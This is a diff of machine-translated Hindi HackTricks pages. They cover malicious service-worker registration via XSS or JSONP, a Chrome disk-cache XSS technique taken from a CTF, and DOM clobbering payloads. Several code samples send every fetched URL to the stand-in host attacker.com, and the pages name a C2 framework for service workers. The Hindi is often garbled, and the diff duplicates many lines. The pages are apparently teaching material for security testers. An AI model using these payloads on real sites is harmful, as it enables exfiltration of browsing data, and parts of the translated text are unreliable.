**पुश सूचना अनुमतियाँ** सीधे रूप से **सेवा कर्मचारी** की क्षमता पर प्रभाव डालती हैं कि सर्वर के साथ संवाद करने की क्षमता उपयोगकर्ता के सीधे अंतर्क्रिया के बिना। यदि अनुमतियाँ निरस्त की जाती हैं, तो यह सेवा कर्मचारी की संभावनाओं को एक सतत धमकी पेश करने की सीमा लगाता है। उलट, अनुमतियाँ प्रदान करने से सुरक्षा जोखिम बढ़ जाते हैं क्योंकि यह संभावित दुरुपयोगों के प्राप्ति और क्रियान्वयन को सक्षम करता है।
इस विकल्प को दुरुपयोग करने के लिए आपको निम्नलिखित की खोज करनी होगी:
## हमला एक सेवा कर्मचारी बनाना
* **सर्वर पर विभिन्न JS फ़ाइलें अपलोड करने** का एक तरीका और एक **XSS जिससे अपलोड की गई JS फ़ाइल का सर्विस वर्कर लोड हो**
* **एक वंलरेबल JSONP अनुरोध** जहां आप **आउटपुट को (विभिन्न JS कोड के साथ) मानिपुलेट कर सकते हैं** और एक **XSS** जिससे **JSONP को एक पेलोड के साथ लोड करने** के लिए **एक दुरुपयोग जोड़ें** जो **एक दुरुपयोगी सर्विस वर्कर लोड करेगा**
इस विकल्प को शारीरिक करने के लिए आपको निम्नलिखित की खोज करनी होगी:
निम्नलिखित उदाहरण में मैं एक कोड प्रस्तुत करने जा रहा हूँ जो एक नया सर्विस वर्कर **रजिस्टर करेगा** जो `fetch` घटना को सुनेगा और **हमलावर के सर्वर को प्रत्येक फेच की URL भेजेगा** (यह कोड आपको **सर्वर पर अपलोड** करने की आवश्यकता होगी या एक **वंलरेबल JSONP** प्रतिक्रिया के माध्यम से लोड करने की):
* **सर्वर पर विभिन्न JS फ़ाइलें अपलोड करने** का एक तरीका और एक **XSS जिससे अपलोड की गई JS फ़ाइल का सेवा कर्मचारी लोड हो**
* **एक विकल्पीय JSONP अनुरोध** जहां आप **आउटपुट को (विभिन्न JS कोड के साथ) मानिपुलेट कर सकते हैं** और एक **XSS** जिससे **पेलोड के साथ JSONP लोड करें** जो एक दुरुपयोगी सेवा कर्मचारी को लोड करेगा।
निम्नलिखित उदाहरण में मैं एक कोड प्रस्तुत करने जा रहा हूँ जो एक नया सेवा कर्मचारी **रजिस्टर करेगा** जो `fetch` घटना को सुनेगा और **हमलावर सर्वर को प्रत्येक फेच किया गया URL भेजेगा** (यह कोड आपको **सर्वर पर अपलोड** करने की आवश्यकता होगी या एक **विकल्पीय JSONP** प्रतिक्रिया के माध्यम से लोड करने की):
```javascript
self.addEventListener('fetch', function(e) {
e.respondWith(caches.match(e.request).then(function(response) {
fetch('https://attacker.com/fetch_url/' + e.request.url)
});
```
और यह कोड है जो **कर्मी को पंजीकृत** करेगा (जिसे आपको **XSS** का दुरुपयोग करके कार्रवाई करनी चाहिए)। इस मामले में एक **GET** अनुरोध **हमलाव** सर्वर पर भेजा जाएगा जो सूचित करेगा कि सेवा कर्मी का पंजीकरण सफल रहा या नहीं:
और यह कोड है जो **कर्मी को पंजीकृत** करेगा (जिसे आपको **XSS** का दुरुपयोग करके निष्पादित करना चाहिए)। इस मामले में एक **GET** अनुरोध **हमलावादियों** सर्वर पर भेजा जाएगा जो सूचित करेगा कि सेवा कर्मी का पंजीकरण सफल रहा या नहीं:
```javascript
<script>
window.addEventListener('load', function() {
@ -64,19 +67,19 @@ xhttp2.send();
});
</script>
```
एक वंलरेबल JSONP एंडपॉइंट का दुरुपयोग करने के मामले में आपको मान `var sw` के अंदर डालना चाहिए। उदाहरण के लिए:
एक विकल्प JSONP इंडपॉइंट का दुरुपयोग करने के मामले में आपको मान `var sw` के अंदर डालना चाहिए। उदाहरण:
```javascript
var sw = "/jsonp?callback=onfetch=function(e){ e.respondWith(caches.match(e.request).then(function(response){ fetch('https://attacker.com/fetch_url/' + e.request.url) }) )}//";
```
एक **C2** है जो **सेवा कर्मचारियों का शोषण** करने के लिए समर्पित है जिसे [**Shadow Workers**](https://shadow-workers.github.io) कहा जाता है जो इन दुरुपयोगों का उपयोग करने में बहुत उपयोगी होगा।
एक **C2** है जो **सर्विस वर्कर्स का शोषण** करने के लिए समर्पित है जिसे [**Shadow Workers**](https://shadow-workers.github.io) कहा जाता है जो इन वंशावशेषों का दुरुपयोग करने के लिए बहुत उपयोगी होगा।
**24-घंटे कैश निर्देशिका** एक दुर्भाग्यपूर्ण या संक्रमित **सेवा कर्मचारी (SW)** का जीवन सीमित करती है अधिकतम 24 घंटे एक एक्सएसएस दुरुपयोग सुधार के बाद, यदि ऑनलाइन ग्राहक स्थिति मानी जाए। दुरुपयोग को कम करने के लिए, साइट ऑपरेटर SW स्क्रिप्ट का समय-से-जीवन (TTL) कम कर सकते हैं। डेवलपरों को त्वरित निष्क्रिय करने के लिए एक [**सेवा कर्मचारी किल-स्विच**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) बनाने की सलाह दी जाती है।
**24-घंटे कैश निर्देशिका** एक दुर्भाग्यपूर्ण या संक्रमित **सर्विस वर्कर (SW)** का जीवन सीमित करती है अधिकतम 24 घंटे के लिए एक XSS दुरुस्ति सुधार के बाद, यदि ऑनलाइन ग्राहक स्थिति मानी जाए। दुरुस्ति को कम करने के लिए, साइट ऑपरेटर SW स्क्रिप्ट का समय-से-जीवन (TTL) कम कर सकते हैं। डेवलपरों को त्वरित निष्क्रिय करने के लिए एक [**सर्विस वर्कर किल-स्विच**](https://stackoverflow.com/questions/33986976/how-can-i-remove-a-buggy-service-worker-or-implement-a-kill-switch/38980776#38980776) बनाने की सलाह दी जाती है।
## DOM क्लॉबरिंग के माध्यम से SW में `importScripts` का दुरुपयोग
## DOM Clobbering के माध्यम से SW में `importScripts` का दुरुपयोग
ेवा कर्मचारी से बुलाई गई **`importScripts`** फ़ंक्शन **एक विभिन्न डोमेन से स्क्रिप्ट आयात कर सकती है**। यदि इस फ़ंक्शन को एक **पैरामीटर के साथ बुलाया जाता है जिसे एक हमलावार संशोधित कर सकता है** तो वह अपने डोमेन से एक JS स्क्रिप्ट आयात कर सकेगा और एक्सएसएस प्राप्त कर सकेगा।
र्विस वर्कर से बुलाई गई **`importScripts`** फ़ंक्शन **एक विभिन्न डोमेन से स्क्रिप्ट आयात कर सकती है**। यदि इस फ़ंक्शन को एक **पैरामीटर के साथ बुलाया जाता है जिसे एक हमलावार संशोधित कर सकता है** तो वह अपने डोमेन से एक JS स्क्रिप्ट आयात कर सकेगा और XSS प्राप्त कर सकेगा।
**यह यहाँ भी सीएसपी संरक्षण को उल्लंघित करता है।**
**यह यहाँ तक कि CSP संरक्षण को भी उल्लंघन करता है।**
**उदाहरण विकल्प दुर्भाग्यपूर्ण कोड:**
@ -96,7 +99,7 @@ self.importScripts(host + "/sw_extra.js");
```
### DOM Clobbering के साथ
DOM Clobbering के बारे में अधिक जानकारी के लिए जांचें:
DOM Clobbering क्या है इसके बारे में अधिक जानकारी के लिए जांचें:
{% content-ref url="dom-clobbering.md" %}
[dom-clobbering.md](dom-clobbering.md)
@ -104,7 +107,7 @@ DOM Clobbering के बारे में अधिक जानकारी
अगर SW जिसे **`importScripts`** को कॉल करने के लिए उपयोग किया जा रहा है, उस URL/domain को **एक HTML element के अंदर** है, तो **DOM Clobbering के माध्यम से इसे संशोधित करना संभव** है ताकि SW **अपने खुद के डोमेन से एक स्क्रिप्ट लोड कर सके**
इसका उदाहरण के लिए संदर्भ लिंक देखें।
इसका उदाहरण के लिए संदर्भ लिंक की जाँच करें।
## संदर्भ
@ -112,7 +115,7 @@ DOM Clobbering के बारे में अधिक जानकारी
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
वो vulnerabilities खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपके आटैक सरफेस को ट्रैक करता है, proactive धमाकेदार स्कैन चलाता है, APIs से वेब ऐप्स और क्लाउड सिस्टम तक के इश्यूज़ खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks) आज।
वो vulnerabilities खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, proactive खतरा स्कैन चलाता है, APIs से वेब ऐप्स और क्लाउड सिस्टम जैसे आपके पूरे टेक स्टैक में मुद्दे खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -121,10 +124,10 @@ DOM Clobbering के बारे में अधिक जानकारी
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
</details>

View file

@ -1,45 +1,45 @@
# Chrome कैश से XSS तकनीक
# Chrome कैश से XSS
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
इस तकनीक में चर्चा किया गया है जो दो प्रमुख कैश प्रकारों - **बैक/फॉरवर्ड कैश (bfcache)** और **डिस्क कैश** के व्यवहार और अंतराक्रिया को समझने में सहायक है। bfcache, जो पूरे पृष्ठ का एक संपूर्ण स्नैपशॉट संग्रहित करता है जिसमें जावास्क्रिप्ट हीप शामिल है, बैक/फॉरवर्ड नेविगेशन के लिए डिस्क कैश की तुलना में प्राथमिकता दी जाती है क्योंकि इसकी क्षमता अधिक समग्र स्नैपशॉट संग्रहित करने की होती है। उलट, डिस्क कैश, जो वेब से प्राप्त संसाधनों को जावास्क्रिप्ट हीप को शामिल किए बिना संग्रहित करता है, और संचार लागत को कम करने के लिए बैक/फॉरवर्ड नेविगेशन के लिए उपयोग किया जाता है। डिस्क कैश का एक दिलचस्प पहलू यह है कि इसमें `fetch` का उपयोग करके प्राप्त किए गए संसाधनों को शामिल किया जाता है, जिसका मतलब है कि ब्राउज़र द्वारा कैश से एक्सेस किए गए URL संसाधनों को प्रदर्शित किया जाएगा।
इस तकनीक में चर्चा किया गया है जो दो प्रमुख कैश प्रकारों: **बैक/फॉरवर्ड कैश (bfcache)** और **डिस्क कैश** के व्यवहार और अंतराक्रिया को समझने में सहायक है। bfcache, जो पूरे पृष्ठ का एक संपूर्ण स्नैपशॉट संग्रहित करता है जिसमें JavaScript हीप शामिल है, बैक/फॉरवर्ड नेविगेशन के लिए डिस्क कैश की तुलना में प्राथमिकता दी जाती है क्योंकि इसकी योग्यता अधिक समग्र स्नैपशॉट संग्रहित करने में है। उसके विपरीत, डिस्क कैश, जो वेब से प्राप्त संसाधनों को संग्रहित करता है जिसमें JavaScript हीप शामिल नहीं है, और संचार लागत को कम करने के लिए बैक/फॉरवर्ड नेविगेशन के लिए उपयोग किया जाता है। डिस्क कैश का एक दिलचस्प पहलू यह है कि इसमें `fetch` का उपयोग करके प्राप्त किए गए संसाधनों को संग्रहित किया जाता है, जिसका मतलब है कि ब्राउज़र द्वारा कैश से पहुँचे गए URL संसाधनों को प्रदर्शित किया जाएगा।
### मुख्य बिंदु:
- **bfcache** बैक/फॉरवर्ड नेविगेशन में डिस्क कैश की तुलना में प्राधिकरण रखता है।
- bfcache को अक्षम करने के लिए:
डिफ़ॉल्ट रूप से, पप्पेटीयर bfcache को अक्षम करता है, जो क्रोमियम की दस्तावेज़ीकरण में दी गई शर्तों के साथ मेल खाता है। bfcache को अक्षम करने का एक प्रभावी तरीका `RelatedActiveContentsExist` का उपयोग करके किया जा सकता है, जिसे `window.open()` के साथ एक पृष्ठ खोलकर प्राप्त किया जा सकता है जो `window.opener` का संदर्भ रखता है।
डिफ़ॉल्ट रूप से, Puppeteer bfcache को अक्षम करता है, जो क्रोमियम की दस्तावेज़ीकरण में दी गई शर्तों के साथ मेल खाता है। bfcache को अक्षम करने का एक प्रभावी तरीका `RelatedActiveContentsExist` का उपयोग करके किया जा सकता है, जिसे `window.open()` के साथ एक पृष्ठ खोलकर प्राप्त किया जा सकता है जो `window.opener` का संदर्भ रखता है।
### व्यवहार क पुनरावृत्ति:
### व्यवहार क पुनरावृत्ति:
1. किसी वेबपेज पर जाएं, जैसे, `https://example.com`
2. `open("http://spanote.seccon.games:3000/api/token")`ा क्रियान्वयन करें, जिससे एक सर्वर प्रतिक्रिया 500 स्थिति कोड के साथ प्राप्त होती है।
3. नए खुले टैब में, `http://spanote.seccon.games:3000/` पर नेविगेट करें। यह क्रिया `http://spanote.seccon.games:3000/api/token` की प्रतिक्रिया को डिस्क कैश के रूप में कैश करती है।
4. `history.back()` का उपयोग करके पिछले पेज पर नेविगेट करें। यह क्रिया पृष्ठ पर कैश किए गए JSON प्रतिक्रिया का प्रदर्शन करती है।
1. किसी वेबपेज पर जाएं, उदाहरण के लिए, `https://example.com`
2. `open("http://spanote.seccon.games:3000/api/token")`ो क्रियान्वित करें, जिससे सर्वर से 500 स्थिति कोड के साथ प्रतिक्रिया प्राप्त होती है।
3. नए खुले टैब में, `http://spanote.seccon.games:3000/` पर नेविगेट करें। यह कार्रवाई `http://spanote.seccon.games:3000/api/token` की प्रतिक्रिया को डिस्क कैश के रूप में कैश करती है।
4. `history.back()` का उपयोग करके पिछले पेज पर नेविगेट करें। यह कार्रवाई पृष्ठ पर कैश किए गए JSON प्रतिक्रिया का प्रदर्शन करती है।
डिस्क कैश का उपयोग हुआ है यह सत्यापित करने के लिए गूगल क्रोम में डेवटूल्स का उपयोग करके किया जा सकता है
डिस्क कैश का उपयोग हुआ है यह सत्यापित किया जा सकता है गूगल क्रोम में डेवटूल्स का उपयोग करके।
bfcache और डिस्क कैश पर अधिक विवरण के लिए, संदर्भ [web.dev पर bfcache](https://web.dev/i18n/en/bfcache/) और [क्रोमियम के डिज़ाइन दस्तावेज़ों पर डिस्क कैश](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/) मिल सकते हैं।
bfcache और डिस्क कैश पर अधिक विवरण के लिए, संदर्भ [web.dev पर bfcache](https://web.dev/i18n/en/bfcache/) और [क्रोमियम के डिज़ाइन दस्तावेज़ों पर डिस्क कैश](https://www.chromium.org/developers/design-documents/network-stack/disk-cache/) में मिल सकते हैं।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>

View file

@ -4,24 +4,24 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** प्राप्त करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
## **मूल बातें**
**HTML टैग** में **`id`** और **`name`** विशेषताओं के साथ **JS संदर्भ** में **वैश्विक चर** उत्पन्न करना संभव है।
HTML टैग में **`id`** और **`name`** विशेषताओं के साथ **JS संदर्भ** में **वैश्विक चर** उत्पन्न करना संभव है।
```html
<form id=x></form>
<script> console.log(typeof document.x) //[object HTMLFormElement] </script>
```
**केवल** कुछ तत्व ही **नाम विशेषता** का उपयोग कर सकते हैं जिससे ग्लोबल को क्लॉबर किया जा सकता है, वे हैं: `embed`, `form`, `iframe`, `image`, `img` और `object`.
**केवल** कुछ तत्वों का उपयोग करके **नाम विशेषता** को ग्लोबल्स को ले जाने के लिए किया जा सकता है, वे हैं: `embed`, `form`, `iframe`, `image`, `img` और `object`.
दिलचस्प है, जब आप एक **फॉर्म तत्व** का उपयोग करके एक वेरिएबल को **क्लॉबर** करते हैं, तो आपको तत्व के खुद का **`toString`** मान मिलेगा: `[object HTMLFormElement]` लेकिन **एंकर** के साथ **`toString`** एंकर **`href`** होगा। इसलिए, अगर आप **`a`** टैग का उपयोग करके क्लॉबर करते हैं, तो आप **नियंत्रण** कर सकते हैं जब यह **स्ट्रिंग के रूप में व्यवहार किया जाता है**:
दिलचस्प है, जब आप एक **फॉर्म तत्व** का उपयोग करके एक वेरिएबल को **क्लॉबर** करते हैं, तो आपको तत्व के खुद का **`toString`** मान मिलेगा: `[object HTMLFormElement]` लेकिन **एंकर** के साथ **`toString`** एंकर **`href`** होगा। इसलिए, अगर आप **`a`** टैग का उपयोग करके क्लॉबर करते हैं, तो आप **मान** को **स्ट्रिंग के रूप में व्यवहारित** करते समय **नियंत्रण** कर सकते हैं:
```html
<a href="controlled string" id=x></a>
<script>
@ -47,7 +47,7 @@ console.log(x.y)//controlled
alert(x.y.z.value)//controlled
</script>
```
Clobbering अधिक विशेषताएँ **अधिक जटिल है लेकिन फिर भी संभव है**, iframes का उपयोग करके:
Clobbering अधिक गुण है **अधिक जटिल है लेकिन फिर भी संभव है**, iframes का उपयोग करके:
```html
<iframe name=x srcdoc="<a id=y href=controlled></a>"></iframe>
<style>@import 'https://google.com';</style>
@ -57,7 +57,7 @@ Clobbering अधिक विशेषताएँ **अधिक जटिल
स्टाइल टैग का उपयोग **आईफ्रेम को रेंडर करने के लिए पर्याप्त समय देने** के लिए किया जाता है। इसके बिना आपको **अनिर्धारित** अलर्ट मिलेगा।
{% endhint %}
गहरे गुणों को अधिक बदलने के लिए, आप **एचटीएमएल एन्कोडिंग के साथ आईफ्रेम्स** का उपयोग कर सकते हैं:
गहरे गुणों को अधिक बदलने के लिए, आप **एचटीएमएल एन्कोडिंग के साथ आईफ्रेम्स** का उपयोग कर सकते हैं इस प्रकार:
```html
<iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;amp;#x20;name=e&amp;amp;#x20;href=\controlled&amp;amp;gt;<a&amp;amp;#x20;id=d&amp;amp;gt; name=d>' name=b>"></iframe>
<style>@import 'https://google.com';</style>
@ -67,7 +67,7 @@ alert(a.b.c.d.e)//controlled
```
### **फ़िल्टर बाईपासिंग**
यदि एक फ़िल्टर नोड की **संपत्तियों** के **माध्यम से लूप** कर रहा है जैसे कि `document.getElementByID('x').attributes` तो आप **एट्रिब्यूट** **`.attributes`** को **क्लॉबर** कर सकते हैं और **फ़िल्टर को तोड़ सकते हैं**। अन्य DOM संपत्तियाँ जैसे **`tagName`**, **`nodeName`** या **`parentNode`** और भी **क्लॉबर** किए जा सकते हैं
यदि एक फ़िल्टर नोड की **संपत्तियों** के **माध्यम से लूप** कर रहा है जैसे कि `document.getElementByID('x').attributes` तो आप **विशेषता** **`.attributes`** को **ओवरराइड** कर सकते हैं और **फ़िल्टर को तोड़ सकते हैं**। अन्य DOM गुण संबंधित भी **ओवरराइड** किए जा सकते हैं जैसे **`tagName`**, **`nodeName`** या **`parentNode`** और अधिक
```html
<form id=x></form>
<form id=y>
@ -80,15 +80,15 @@ console.log(document.getElementById('y').nodeName)//[object HTMLInputElement]
```
## **`window.someObject` को Clobber करना**
जावास्क्रिप्ट में यह आम है कि हमें यह मिलता है:
जावास्क्रिप्ट में यह आम है कि हमें निम्नलिखित मिलता है:
```javascript
var someObject = window.someObject || {};
```
वेब पृष्ठ पर HTML को मनिपुलेट करने से `someObject` को एक DOM नोड से ओवरराइड किया जा सकता है, सुरक्षा विकल्पों को प्रवेश करने की संभावना हो सकती है। उदाहरण के लिए, आप `someObject` को एक आपत्तिजनक स्क्रिप्ट की ओर इशारा करने वाले एंकर तत्व के साथ बदल सकते हैं:
